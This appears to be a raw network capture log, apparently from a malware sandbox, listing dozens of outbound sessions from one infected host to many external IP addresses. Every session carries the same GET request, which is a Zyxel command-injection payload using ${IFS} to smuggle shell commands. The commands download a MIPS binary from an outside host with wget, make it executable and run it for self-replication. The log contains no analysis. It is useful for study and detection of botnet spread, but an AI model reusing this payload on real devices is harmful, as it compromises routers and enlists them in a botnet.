                                      Jan 14, 2024 15:50:44.259047031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3781192.168.2.143495852.28.173.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259104967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3782192.168.2.1444914183.181.36.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259147882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3783192.168.2.145945834.153.73.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259202003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3784192.168.2.1436098115.211.207.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259259939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3785192.168.2.144128012.4.175.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259310007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3786192.168.2.143651812.173.21.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259361982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3787192.168.2.1438420179.226.133.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259423018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3788192.168.2.1450992220.66.215.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259505033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3789192.168.2.1433174125.114.157.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259543896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3790192.168.2.1458716147.21.202.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259594917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3791192.168.2.1450518133.31.49.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259633064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3792192.168.2.145975846.160.16.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259697914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3793192.168.2.1452354171.177.94.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259737968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3794192.168.2.143716263.62.48.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259794950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3795192.168.2.145203041.101.191.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259864092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3796192.168.2.1436608143.96.197.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259911060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3797192.168.2.145988890.190.80.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.259959936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3798192.168.2.1447336131.232.197.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260010958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3799192.168.2.1449540219.242.223.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260054111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3800192.168.2.1441902209.221.211.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260107040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3801192.168.2.144333690.73.0.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260169983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3802192.168.2.1455968144.18.179.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260215044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3803192.168.2.1460232212.91.3.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260268927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3804192.168.2.144415654.93.0.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260320902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3805192.168.2.145986497.130.179.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260412931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3806192.168.2.144664074.219.4.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260432959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3807192.168.2.143494685.127.27.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260500908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3808192.168.2.1448322120.100.103.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260556936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3809192.168.2.1460678185.179.136.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260621071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3810192.168.2.144931891.84.185.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260689974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3811192.168.2.144441260.142.87.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260730028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3812192.168.2.145766617.56.179.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260797024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3813192.168.2.144786467.134.196.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260845900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3814192.168.2.1439268154.169.156.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260906935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3815192.168.2.1448664122.92.74.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.260957956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3816192.168.2.1455694149.210.162.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261008024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3817192.168.2.1438618102.74.69.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261075020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3818192.168.2.143963248.219.194.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261104107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3819192.168.2.1446482115.189.246.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261142015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3820192.168.2.14508425.105.88.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261214972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3821192.168.2.1446322102.202.59.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261300087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3822192.168.2.145970250.104.126.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261347055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3823192.168.2.1435800179.116.228.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261410952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3824192.168.2.143585276.201.195.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261456966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3825192.168.2.1450972124.251.126.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261503935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3826192.168.2.1440446182.102.174.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261550903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3827192.168.2.143595827.175.248.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261611938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3828192.168.2.145000643.172.253.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261662006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3829192.168.2.1443482207.58.236.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261718035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3830192.168.2.1434452116.27.42.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261774063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3831192.168.2.143998051.211.202.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261817932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3832192.168.2.1445714171.118.44.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261873007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3833192.168.2.1438842136.241.111.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261929989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3834192.168.2.1459730109.98.217.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.261981964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3835192.168.2.1434554189.184.182.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262027025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3836192.168.2.1444488122.58.192.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262077093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3837192.168.2.1444458108.218.240.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262104034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3838192.168.2.144268641.90.17.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262150049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3839192.168.2.1448454161.138.207.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262216091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3840192.168.2.143421469.0.66.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262268066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3841192.168.2.1456416168.184.14.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262319088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3842192.168.2.1437140166.35.0.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262372017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3843192.168.2.1458810103.161.244.102443
                                      TimestampBytes transferredDirectionData
